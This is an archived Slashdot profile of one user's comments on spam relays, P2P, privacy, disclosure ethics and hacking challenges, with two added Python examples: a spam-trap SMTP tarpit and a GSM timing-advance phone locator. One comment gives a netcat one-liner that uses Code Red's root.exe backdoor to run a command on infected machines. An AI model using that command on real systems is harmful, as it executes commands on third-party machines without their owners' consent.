Slashdot Mirror


User: rnt

rnt's activity in the archive.

Stories
0
Comments
32

Comments · 32

  1. Re:No better thant he status quo? on Hacker Club Publishes German Official's Fingerprint · · Score: 4, Funny

    I mean, since fingerprints cannot be conclusive anymore, I foresee our politicians with moral fibers of steel pushing for more surveillance. They will also be pushing for a whole new set of copyright laws, giving governments exclusive copyrights on their citizens' fingerprints. Unauthorized copying or publishing of your own fingerprints will be severely punishable!
  2. Re:I could and I would. on RIAA Plans Cyberwar Effort · · Score: 1

    Why do you automatically assume that I support piracy because I question the ethics of the RIAA and their cronies? ...

    If someone has a P2P client running and the port open, that implies that they are allowing data to be shared. Leech the hell out of their bandwidth so that no pirates can get any.

    Why do you automatically assume that P2P clients are only used for piracy? Most of their users seem to use them for sharing users, true, but just like not all MP3's are illegal, not all P2P clients are used for piracy.

  3. How about doing something with *closed* relays? on TarProxy Creates Tar Pit... For Spammers · · Score: 3, Interesting

    Not exactly the same thing as the article is about, but still related: My mailserver is properly secured and refuses to relay anything except legitimate mail (i.e. it will accept incoming mail for users on the domains it serves and it only relays mail to the outside world when it's from a predefined set of internal machines). There are plenty of spammers trying to convince my mailserver to send their spam to other people, but all get a nice "relaying denied" message and a couple of lines in my maillog.

    I think it's a safe bet all relaying attempts originating from the outside of my network are spammers. The information in the maillog about denied relaying attempts should give an accurate list of IP-numbers used by spammers.

    Doesn't this give some interesting opportunities?
    Creating spamtrap daemons that listen on servers that aren't mailservers (so the fact that they behave similarly to a real mailserver and listen on the same TCP port is just a coincidence). Those servers should be unlisted, not have any DNS records pointing at them being MX for any domains, etc.
    The only way to find them should be by randomly scanning an IP range.
    In that case the only people using them would be spammers trying to abuse random mailservers and it would be pretty safe to have the fake mailserver pretend to accept the mail, wait a while, try to gobble up some resources of the spammer, and finally dumping the spam-attempt to /dev/null and telling the spammer what he or she wants to hear: I have delivered your junk. The logs would prove useful, the spam is prevented. Happy happy, joy joy.

    The biggest disadvantage would be that such a fake relaying server would probably trigger some of the open-relay scanners (although the clueful scanners would wait until a message is actually received). Hmmm, spammers could do the same, really probing a mailrelay before trying to use it...

    Anyway, it would cost spammers more and more effort and probably annoy the hell out of them, which is a Good Thing.
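
The accept-everything fake relay sketched in the comment above, as an added example (my code, not the poster's): an SMTP state machine that says "250 OK: queued" to any sender/recipient pair, logs the envelope and the client IP, delivers nothing, and stalls before every reply so the spammer's connection stays tied up. The announced hostname, the per-reply delay and the log format are assumptions; the page only describes the idea.

```python
"""Fake open relay ("spam trap") that accepts anything and delivers nothing.

Added example, not code from the original post. Assumptions (not from the
page): the trap listens on an address with no MX or other DNS record
pointing at it, so every client that finds it got there by scanning; the
announced hostname, the delay per reply and the log format are invented here.
"""
import logging
import socketserver
import time

TARPIT_DELAY = 10.0                 # seconds to stall before every reply (assumed)
HOSTNAME = "mail.example.invalid"   # hostname the trap announces (assumed)

log = logging.getLogger("spamtrap")


class FakeRelaySession:
    """SMTP state machine for one connection: returns the reply for each
    client line and records (but never delivers) the message."""

    def __init__(self, peer_ip):
        self.peer_ip = peer_ip
        self.sender = None
        self.recipients = []
        self.in_data = False
        self.body_lines = []
        self.accepted = []   # (sender, recipients, body line count) per "delivery"

    def greeting(self):
        return f"220 {HOSTNAME} ESMTP ready"

    def _reset(self):
        self.sender, self.recipients, self.body_lines = None, [], []

    def handle_line(self, line):
        """Process one CRLF-stripped line; return the reply, or None while
        the client is still sending message data."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.accepted.append((self.sender, list(self.recipients),
                                      len(self.body_lines)))
                log.info("trap %s: from=%s to=%s lines=%d (dropped)",
                         self.peer_ip, self.sender, self.recipients,
                         len(self.body_lines))
                self._reset()
                return "250 OK: queued"   # what the spammer wants to hear
            self.body_lines.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {HOSTNAME}"
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip()
            return "250 OK"
        if verb == "RCPT":
            # A properly secured relay would answer "554 relaying denied"
            # for foreign domains here; the trap accepts every recipient.
            self.recipients.append(arg.partition(":")[2].strip())
            return "250 OK"
        if verb == "DATA":
            if not self.recipients:
                return "503 need RCPT first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self._reset()
            return "250 OK"
        if verb == "NOOP":
            return "250 OK"
        if verb == "QUIT":
            return "221 Bye"
        return "500 command not recognized"


class TrapHandler(socketserver.StreamRequestHandler):
    def handle(self):
        session = FakeRelaySession(self.client_address[0])
        self.wfile.write((session.greeting() + "\r\n").encode())
        for raw in self.rfile:
            reply = session.handle_line(raw.decode("latin-1").rstrip("\r\n"))
            if reply is None:
                continue
            time.sleep(TARPIT_DELAY)   # tie up the spammer's connection
            self.wfile.write((reply + "\r\n").encode())
            if reply.startswith("221"):
                break


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    with socketserver.ThreadingTCPServer(("0.0.0.0", 25), TrapHandler) as srv:
        srv.serve_forever()
```

Binding port 25 needs root (or a port redirect); the logged client IPs are the scanner list the comment is after, and nothing that hits the trap is ever forwarded.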

  4. Re:BitMover is NOT the "bad guys" on BitKeeper EULA Forbids Working On Competition · · Score: 1

    This is where BitMover is sitting. Developers are using their software to assist in developing their competition and doing it in violation of their licensing agreement.

    So it would be perfectly reasonable for the GCC folks to decide you can't use gcc for developing any software that will not be placed under the GPL?

    In that case I think I might run into trouble when I want to recompile the kernel on my FreeBSD box... Or would that be GNU/FreeBSD? :-)

  5. Re:Fowarding this to your boss, good idea? on Sysadmin Day. Yay. · · Score: 1

    Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation.
    A little "Thank you" would have sufficed, especially after the hint I dropped.
    It would have taken them less than five minutes to write a little note and would have cost them nothing.


    A little addendum to that: Saturday morning somebody rang the doorbell: breakfast service. It seems all sysadmins at the company I work for have gotten a breakfast.

    The companywide mailinglist now buzzes with happy sysadmins telling all how great it feels to be appreciated!

  6. Re:Fowarding this to your boss, good idea? on Sysadmin Day. Yay. · · Score: 1

    I want to hear if someone forwarded a Sysadmin day story to his boss to bring some awareness and got a positive or negative reply/feedback in return or no answers at all? :)

    Actually, I did so yesterday: I forwarded news items on Sysadmin Appreciation Day to the mailinglist of the IT company I work for (which consists of a couple of management and office staff and a lot of sysadmins, mostly unix, but also some netadmins and DBAs). Every person in the company gets messages submitted to that mailinglist, including the boss.

    The only response I got was a message from the marketing manager joking about presents and confirming the message was understood.

    Apparently it wasn't, because although receiving presents would be nice, all I really needed was a simple: "Thank you for all the time and effort you spend to do your work as good as you can. We know all you guys and girls are working hard and we really appreciate it!".

    Well, at the end of Sysadmin Appreciation Day, I have received neither presents nor a single word of appreciation.
    A little "Thank you" would have sufficed, especially after the hint I dropped.
    It would have taken them less than five minutes to write a little note and would have cost them nothing.

    They did make a fuss about Secretaries Appreciation Day, but I guess even in an IT company technical staff is overlooked.

    I must admit I am pretty disappointed and I am sure I will mention this at my yearly employee review.

  7. Re:GPS Phone Question on Just How Much Privacy Do We Have? · · Score: 1

    The GSM network is able to calculate locations of individual phones quite nicely without GPS.

    First of all, since it's a network divided in cells, it's always possible to tell in which cell an individual phone is. Sizes of cells differ, but I believe the maximum radius of a cell was something about 35km. In urban surroundings cells are usually considerably smaller.

    That's not all...

    If I recall correctly (I am really not an expert on this, but I'll try to write down some things I've read a while ago), GSM uses some sort of Time Division Multiple Access system.
    This simply means multiple phones can transmit data on shared radio frequencies by waiting until it's their turn to transmit.
    The timing of when to transmit becomes pretty important to prevent phones accidentally jamming each other. The distance of the mobile unit to the base station has to be taken into account because this distance can be translated into a delay between the data being transmitted and the moment it arrives at the base station. To compensate for this, the phone calculates a "timing advance" delay.

    I think the accuracy of this is about 500 meters. I am not sure if you can use this to triangulate a position in the system. If a mobile unit scanned channels on multiple base stations and calculated the Timing Advance for each of those (which it should do if it wants to use the channels for transmitting), then triangulation would be possible and by combining more data the accuracy would improve as well.

    It's not GPS but good enough for most purposes and since it's a necessary part of the system, it's already usable and it's impossible to remove that "feature" from your phone...
    With or without GPS-enabled GSM: if you don't want to be located with your GSM phone TURN IT OFF (highly recommendable in theatres, cinemas, meetings, restaurants, etc, by the way).

    Interesting question: would it be possible to write a Java applet to retrieve the TAs and do something useful with a list of base stations and those TAs?
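
The arithmetic behind the comment above, as an added example (mine, not the poster's). One TA step is one GSM bit period (48/13 microseconds) of round-trip delay, which works out to roughly 553 m of one-way distance, and the maximum value of 63 lands at about 35 km, the cell-radius limit the comment quotes. Given the TA seen by several base stations, the phone must lie in the intersection of the corresponding distance rings; the code finds that intersection by brute-force grid search. The base-station coordinates, the phone position and the grid resolution are constructed for the example, and the assumption that the base station truncates the measured delay to whole steps is mine.

```python
"""Coarse phone location from GSM Timing Advance (TA) values.

Added example, not from the original post. Standard GSM facts used: the TA
is reported in whole bit periods of 48/13 microseconds of round-trip delay
and runs from 0 to 63. Everything else (base-station coordinates, the phone
position, truncation to whole steps, the grid search) is constructed here.
"""
import math

BIT_PERIOD_S = 48 / 13 * 1e-6               # one GSM bit period
C_M_PER_S = 299_792_458.0
TA_STEP_M = C_M_PER_S * BIT_PERIOD_S / 2    # one-way distance per TA step, ~553 m
TA_MAX = 63                                 # 63 steps ~ 35 km, the cell radius limit


def ta_for_distance(distance_m):
    """TA a base station assigns to a phone at this one-way distance.
    Assumes (not from the page) that the measured delay is truncated to
    whole steps."""
    ta = int(distance_m / TA_STEP_M)
    if ta > TA_MAX:
        raise ValueError("phone is beyond the maximum GSM cell radius")
    return ta


def distance_bounds(ta):
    """Half-open [lo, hi) ring of one-way distances consistent with a TA."""
    return ta * TA_STEP_M, (ta + 1) * TA_STEP_M


def locate(stations, ta_values, grid_m=50.0):
    """Find where every station's TA ring holds, by grid search.

    stations:  list of (x, y) base-station coordinates in metres
    ta_values: TA each of those stations reports for the same phone
    Returns (centroid_x, centroid_y, feasible_points), or None when the
    readings are mutually inconsistent."""
    rings = [distance_bounds(ta) for ta in ta_values]
    reach = max(hi for _, hi in rings)
    x_lo = min(x for x, _ in stations) - reach
    x_hi = max(x for x, _ in stations) + reach
    y_lo = min(y for _, y in stations) - reach
    y_hi = max(y for _, y in stations) + reach
    nx = int((x_hi - x_lo) / grid_m) + 1
    ny = int((y_hi - y_lo) / grid_m) + 1
    feasible = []
    for i in range(nx):
        x = x_lo + i * grid_m
        for j in range(ny):
            y = y_lo + j * grid_m
            if all(lo <= math.hypot(x - sx, y - sy) < hi
                   for (sx, sy), (lo, hi) in zip(stations, rings)):
                feasible.append((x, y))
    if not feasible:
        return None
    cx = sum(x for x, _ in feasible) / len(feasible)
    cy = sum(y for _, y in feasible) / len(feasible)
    return cx, cy, feasible


def demo():
    """Three constructed base stations and a phone at a known spot: derive
    the TA each station would see, then recover the spot from the TAs."""
    stations = [(0.0, 0.0), (8000.0, 0.0), (3000.0, 7000.0)]   # constructed
    phone = (2500.0, 2000.0)                                   # constructed
    tas = [ta_for_distance(math.hypot(phone[0] - sx, phone[1] - sy))
           for sx, sy in stations]
    cx, cy, feasible = locate(stations, tas)
    error_m = math.hypot(cx - phone[0], cy - phone[1])
    return tas, (cx, cy), error_m, len(feasible)


if __name__ == "__main__":
    tas, est, err, n = demo()
    print(f"TAs seen: {tas}; estimate ({est[0]:.0f}, {est[1]:.0f}) m; "
          f"{err:.0f} m off, from {n} feasible grid points")
```

A single station only gives a ring about 553 m wide (the "about 500 meters" in the comment); with three stations the intersection in the demo shrinks to a patch a few hundred metres across, and the geometry matters as much as the count: two stations on opposite sides of the phone constrain the same axis twice and add little.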

  8. WTF: "tech-savvy fans"?!?! on Moby Says Techie Fans = Fewer Sales · · Score: 1

    Excuse me, being able to get on the Internet and owning a CD-writer may have been enough for being labeled "tech-savvy" half a decade ago.
    Nowadays being able to find the powerswitch on your computer and clicking on a few buttons is all the technical capacity you need to download and burn.

    I take offense at "tech-savvy" being used in such an indiscriminate manner!
    I'm also quite unhappy about the implicit message, which seems to be "most tech-savvy people are thieves".

    But then again, an attitude like Moby shows explains a lot about the music business in general. Some sort of distorted paranoid view of the world in which everybody tries to steal their work.

  9. Re:Defensive on Moby Says Techie Fans = Fewer Sales · · Score: 1

    Err. how do you know it's crap if you didn't buy it and listen? It's the album after the crap one that is meant to suffer

    How come everybody simply assumes people are stealing music?

    I could have listened to the album in the store (just as I could have in the "old days" when there were no CDs).
    I could have listened to the album because a friend already bought it. At my current workplace people sometimes put a CD in the player and play it loudly.

    Shame on me for listening to an album before paying a lot of money for it! :-)
    Maybe you buy albums without knowing what's on them, most other people like to know what they're paying for.

    It's not necessary to copy an album to get to hear it before you buy it. It's not necessary now, and it never was before.

  10. What's next? on Unique ID Codes for CD / DVD Manufacturers · · Score: 3, Funny

    Next time I go to the shop to buy a CD or DVD I will have to show my ID which will get registered?
    Maybe give a sample of my DNA? Or a license agreement signed in blood?

    When I sell or give away any of my CDs or DVDs I will have to inform some representative of the music industries there has been a change of ownership?

    How long will it take before musical instruments are being forbidden? Their sole purpose is to play music and most of the music being played may in fact be reproductions!

    "Sir, you are violating copyrights. Put down that saxophone and step away from it! Do not play another note or we WILL shoot you!"

  11. Faraday cage on Sun Joins RFID Program · · Score: 1

    Most people on slashdot are quite aware of the danger ESD poses to expensive electronic components. I would feel a lot safer with my expensive laptop tucked away in a bag that is lined with fine conductive mesh.

    There is one other nice thing about constructions like that: they block RF emissions. :-)

    I still have to figure out what to do with tagged clothing... I don't fancy walking around in something that closely resembles chainmail (except when I also get to wield a sword and a shield).

  12. Re:So what? on Oracle 9i Isn't Quite Unbreakable · · Score: 1

    Why would any admin put their database server out on the open internet, exposed to this anyway? Databases should be kept behind firewalls, where it's safe.

    Safe?

    Actually, I recall a lot of statistics indicating there is a considerable number of attacks on servers originating from INSIDE the firewall. Done by employees.

    Mind you, the servers at the company I work for are doubly firewalled (outside and inside), but people still need to use the databases and other services so there need to be some holes in the internal firewall, potentially making the servers vulnerable to attacks. Despite the firewalls there are still a lot of things to worry about...

  13. Re:Wonder if I could be prosecuted on Report Security Problems, Face The Consequences · · Score: 2, Insightful

    It would be nice to have a law passed that explicitly made it okey-dokey for people to merely inform a Trojaned luser of their situation, so long as no harm was done.

    I don't think that law is needed. I don't see any reason why people informing trojaned lusers cannot do that safely. I have got countless Code Red probes in my Apache logs and have seriously thought about trying to warn those people (it's just there are too many of those).
    There's no way that could be illegal.

    I won't be trying to "verify" if the root.exe exploit is available on those machines, since that could give me some serious trouble if someone were to pursue a claim against me.
    No matter what my intentions are, that would be gaining unlawful access to someone else's machine.

    The problem with your statement "(...) so long as no harm was done" is that it is hard to maintain objectively.

    Suppose a server I am sysadmin of has a security hole. You're trying to help me and being a white hat hacker you enter my machine and take a good look around and after doing so you create a nice summary of problems and even the necessary fixes.

    At first sight, that really is commendable.

    However, since I don't know you or your intentions can I safely assume you meant no harm and did no evil things to my machine? Should I take your word for it? For all I know you're just helping me to patch up my machine so no other evil hackers get in and you are the only one that is able to get into my now mostly-secure-but-now-backdoored-machine.

    The consequence of you trying to help me is that I would have to retrace all your actions on my machine, which might not have been necessary if you didn't try to "help" me by gaining access to my machine without asking me in advance.
    Surely I'd have to do a full security audit anyway, but now there is more information in the logs to be checked out.

    No matter what your intentions are and how stupidly I misconfigured my machine, your attempt to help me just cost me a whole lot of extra time and downtime.

    Informing people is fine and totally legal. Gaining access to their machines without their consent is illegal and rightfully so, as far as I'm concerned.

    The law I would like to see is one that holds people accountable for problems caused by those people not securing their machines (Code Red anyone... think of all the bandwidth wasted by that little prank). Better still, don't make it a law, ISPs could take it up in their conditions they are allowed to pull the plug when such problems aren't fixed within a certain period!

  14. Re:Depends.. on Report Security Problems, Face The Consequences · · Score: 1

    Doesn't his intent count for anything?

    Although I think his intent should be taken into account and I think he should have been thanked for notifying pdfn.com, I also think West should have been aware of the risk.

    If on Feb. 1st Brian West realized there was no authentication required to edit any file on the site, that would have been enough to warn somebody. Yet he felt it necessary to "test" the hole one day later.

    Actually testing the hole wasn't a smart thing to do. There was no need to and no matter how you look at it, it is illegal. Therefore if the site's owner is overly paranoid they can, and probably will, call the authorities.

    If a ground floor window is unlocked and you climb into a building through it, you can expect some trouble over it. Saying "I was just verifying if you got a security hole" doesn't mean you didn't unlawfully enter a building.

    Don't get me wrong here, I don't think Brian West had anything malicious in mind when he verified the security hole and I am really amazed the way this whole incident turned out, but I still think he shouldn't have made use of the security hole.

    There are some serious paranoid people out there and there's always a chance of someone feeling threatened and doing something stupid.
    The site owner's reaction is not too smart, but I really don't understand why the FBI agents came down on West the way they did. They should have realized West was just trying to help pdfn.com and they shouldn't be getting into the "eek, an Evil Hacker just invaded this website" mode...

    But then, this isn't really the first time this sort of scenario happened and people don't seem to learn from that.

  15. Remotely disabling root.exe justifiable? on Code Red Back For More · · Score: 2, Informative

    I'm still doubting if I will run something like this on my machines:

    tail -f /var/log/httpd/access_log | gawk '/default.ida/ { system("printf \"GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0\\r\\n\\r\\n\" | nc -w 5 " $1 " 80") }'

    In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

    Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

    This root.exe might be a step up for causing even more problems at a later time!

    Argh, that poses a bit of a moral dilemma for me...

  16. Re:Maybe genuinely secure laptops make more sense. on Laptop Lojack? · · Score: 1

    I've always learned that you ought to have backups of important information.

    If the data stored on the laptop is important enough to attempt to retrieve the laptop, I think it's quite a stupid mistake not to have backups!

    After all, there could be hardware failures or the owner of the laptop could accidentally drop it, then a bus could drive over it after which it could be flung into a nearby river!

    You wouldn't believe the amount of damage a family of crabs could do to a submerged laptop!

  17. Re:Business card sized CD-recordables? on New Business Card Rescue CDs · · Score: 1

    You know what we really need? Business card size disposable computers, with a nice little color LCD, and enough power to run a little kiosk-type browser. The technology probably isn't too far off..

    Not exactly disposable (quite a pricey toy in fact) and not nearly flexible enough, but still worth a look: Rex

  18. Business card sized CD-recordables? on New Business Card Rescue CDs · · Score: 1

    These oddly cut mini CDROMs aren't really new...

    But wouldn't we geeks just *love* to get our hands on RECORDABLES of the same size!!!

    Finally we can have some high-res pictures of our loved ones in our wallets (140MB... hmmm, quite a lot of loved ones, family, coworkers, pets, pictures of computers and whatever you want to take with you) :-)

  19. Re:If only I could SSH on SSH v. SRP · · Score: 2

    On the rare occasions I need to ssh from a windows machine I use PuTTY.

    The main reason I like it is because it's just one .exe file. I always find when I'm in need of ssh there is no ssh-client installed on the machine I'm working on...
    PuTTY doesn't waste my time with fancy installshields: you download it and you start it. That's it.

    I must admit most of the time I'm working on unix machines, PuTTY is just to fill the gap... :-)

    http://www.chiark.greenend.org.uk/~sgtatham/putty.html

  20. Re:Buy it here - Re:Mobile Phone Killer on HERF Gun: Make it in your basement · · Score: 1

    There already is a mobile phone killer.

    Actually that is something different. The HERF gun puts out enough energy in one pulse to interfere with the electronics inside the target, causing it to malfunction.

    The phonekiller you're mentioning transmits a lowpower signal on the frequencies used by the phone making it impossible for it to communicate with the telecom provider. The phone itself keeps on functioning just fine, but it's unable to reach the official stations to make a call.

    I even heard the really cool jammers can be programmed to put messages on the phone's display (normally the provider's name is put on the display, but since a jamming device drowns the original signal "creative" messages are possible as well).

  21. Re:Concealed weapon and public schools ? on HERF Gun: Make it in your basement · · Score: 1

    I think schools (or other places where they use metal detectors) should be more afraid of people using HERF guns to disable the detection equipment in order to circumvent security.

  22. Re:At last on On the Subject of Trolls · · Score: 1

    Let's face it: there is probably a very good reason for ACs here on Slashdot, it is probably so that 1)people without a login (or too lazy to login) can still participate in discussions, and 2)some of us may want to say something that could be detrimental to ourselves, possibly even costing jobs or worse.

    First of all: I think anonymity on /. is a Good Thing, but I don't agree with the reasons you give for people posting as AC. Being too lazy to login? Come on, typing two words (loginname and password) isn't that hard, is it? If that is too much of an effort, is that post really necessary? Your second point is the necessity of being anonymous because of real-life implications. Well I think both of us ("smasch" and "rnt") are reasonably anonymous. We both have chosen not to put our email address or homepage on top of our posts.

    I know there are times when this relative anonymity is not enough, because posts I make can be attributed to this rnt-slashdot-person and people can read my posting history and see what a nice and intelligent person I am (or asshole, opinions may differ, though personally I like the first option better)... That doesn't bother me, but some people might not like that.

    For people who want to post anonymously but not with the AC default score of 0 an option to post as Deliberately Concealed (DC... grin) could be a solution. Not even your slashdot name is revealed, but moderating applies to your karma because internally the /. system knows who you are.
    Good posts are rewarded, bad posts punished.
    DC posts rank higher than AC posts and everybody is happy!

    In that situation people who *still* feel the need to post as AC are a bit suspicious if you ask me... It seems like in that case it's not as much a matter of wanting to be anonymous, but a matter of not wanting to be accountable for their posts!

    I can understand that some people have the need to say things anonymously. But I like being an individual and being recognized and I also like being able to recognize other people saying smart, funny, silly, or stupid things.

    Hmmm, it seems my conclusion is that if there is a DC-like posting mode mostly troll-like persons would want to post as AC. So scrutinize AC posts! Registering as a user and logging in isn't that much of a hassle... and it's worth it!

  23. Re:Infinity transmitter?? on NSA backdoor creates security hole in Windows · · Score: 1

    Hack-Tic (a Dutch hacker magazine) published in 1992 an article about eavesdropping on telephones that are on-hook (unfortunately the article is written in Dutch, but you're probably more interested in the schematics at the end of the article anyway).

    I believe the technical term is high-frequency flooding, but IANAEE[0].

    The phones on which the technique worked were in fact the older models that do use an actual physical switch. The vulnerable phones used a switch that contained several metal strips.

    Basically it works like this: instead of a direct current the phone is fed a high-frequency alternating current. Because of the high frequency the contacts of the switch will act like a capacitor, allowing a current to run through the circuit. The microphone does work that way!
    I have seen it work and I was impressed. Audio quality wasn't quite good, but the demonstration did something supposedly impossible so hi-fi audio wasn't important, the conversation in the room was intelligible.

    (quite funny: the Dutch telecom provider first denied it was possible, but soon started to sell kits to prevent eavesdropping using this technique)

    On modern telephones this wouldn't work I guess, simply because the physical switch isn't the only thing inbetween the microphone and the phoneline (amplifiers, filters, whatever...).

    I hope this helps...


    [0] I am not an electrical engineer...

  24. Re:linuxppc owned. on CrackThisBox Updates · · Score: 1

    it's in the MS "people"'s best interest to attack their own box

    But the same goes for the linux guys...

    I honestly believe the Linux box is being battered by people using linux.

    First of all I know more about linux and *nix in general than about NT. The linux box makes a more attractive target that way. That argument probably goes for many of the linux people.
    Why would I try to break an os I don't use? Just to prove it's unstable? I'm not that kind of guy and frankly, I don't really care.

    Yes, I am a bit biased... so I'd rather see the linux ppc being really put to the test.

    I believe ESR wrote that open source worked because people were "scratching personal itches".

    Linux security is *my* personal itch, Windows security is someone else's.

    I'll scratch your back if you scratch mine...
    The Halloween documents may be a clear indication that MS is not about to scratch Linux' back.

    But on the distribution of attacks:
    I expect the D.O.S. attacks being mostly cross-platform (linux kiddies trying to nuke win2k and windows kiddies trying to nuke linuxppc), while the clueful attacks are being done by people who know a bit about the os they're trying to get into.

  25. Re:PR on LinuxPPC Challenge: Crack the Box and Keep it! · · Score: 1

    a couple of the postings have pointed out that this could turn out to be a kind of an almost-competition between linuxppc and the W2K bug-- if one gets hacked and the other doesn't, that means that that OS is more secure.


    I don't quite agree... in the August 4th part 3 log entry on crack.linuxppc.org it is mentioned that portmap, sendmail, and ftp will be turned on eventually.

    So now we have a win2k machine that is supposed to be secured to the max on one side of the arena and a linuxppc machine which will be gradually opened up on the other side.

    Clever move of linuxppc because first of all turning on more services keeps people interested. Let people have their fun! Having fun and learning a thing or two on the way. What more do we want?

    Another benefit could be that the two machines cannot be compared that way:
    The linuxppc machine is willingly set up in a way that increases the risks of anyone getting in.

    So if the linuxppc machine gets compromised it is not a big deal, it is more or less intended.
    That makes it kind of hard to brag that the win2k box remained intact (in some sense anyway) while the linuxppc has been hacked.

    Besides that: there is much more to learn from a box that does get broken into. Something to do with "learning from mistakes" I believe... and I quite like the idea of other services getting a nice pounding too.